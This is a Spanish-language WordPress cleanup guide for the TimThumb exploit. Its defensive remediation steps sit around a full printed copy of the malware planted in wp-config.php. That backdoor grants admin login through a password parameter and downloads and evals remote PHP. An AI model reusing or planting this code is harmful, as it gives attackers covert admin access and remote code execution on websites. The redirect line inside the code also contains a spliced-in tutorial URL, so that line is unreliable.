TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad en él, pero ahora es SEGURO usarlo.
Entonces, ¿cómo sabe que su sitio ha sido pirateado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:
Si comienza a ser bombardeado con correos electrónicos sobre usuarios que son redireccionados desde su sitio. Lo más probable es que su sitio haya sido víctima de este exploit.
Como medida de precaución, todos deberían usar esta Escáner de vulnerabilidades de Timthumb. Esto le dirá si está utilizando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron su núcleo de inmediato. Así que esto plugin comprobará si está instalada la nueva versión segura de Timthumb o si está instalada una versión anterior.
Ahora bien, si su sitio ya fue víctima de este exploit de Timthumb, esto es lo que debe hacer.
Primero debe eliminar los siguientes archivos:
/wp-admin/upd.php /wp-content/upd.php
Inicie sesión en el panel de administración de WordPress y reinstale su versión de WordPress. Específicamente, buscamos reinstalar estos archivos:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
Entonces abre tu wp-config.php donde probablemente encontrará este gran código de malware que está recolectando credenciales de inicio de sesión y cookies. Este código estará en la parte inferior.
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE="JavaScript">location.href="https://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/$fnm";</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
En la carpeta de su tema, busque en cualquier lugar donde el script TimThumb pueda estar almacenando los archivos en caché. Por lo general, están en esta estructura:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
Elimina todo lo que tenga este aspecto. Si no está seguro de algunas cosas, elimine todo lo que no sea un archivo de imagen.
Lo siguiente que debe hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php
Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvide cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla «Error al establecer conexión».
Cambie las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo a la generador en línea.
Ahora has terminado. No olvide vaciar todo el almacenamiento en caché de la página plugins. Como medida de precaución, también es bueno borrar la caché y las cookies de su navegador.
Para los desarrolladores, intente usar la función Tamaños de imagen adicionales en WordPress para reemplazar las funcionalidades de Timthumb.
Háganos saber si necesita más ayuda utilizando nuestro formulario de contacto.
.
Fuente: wpbeginner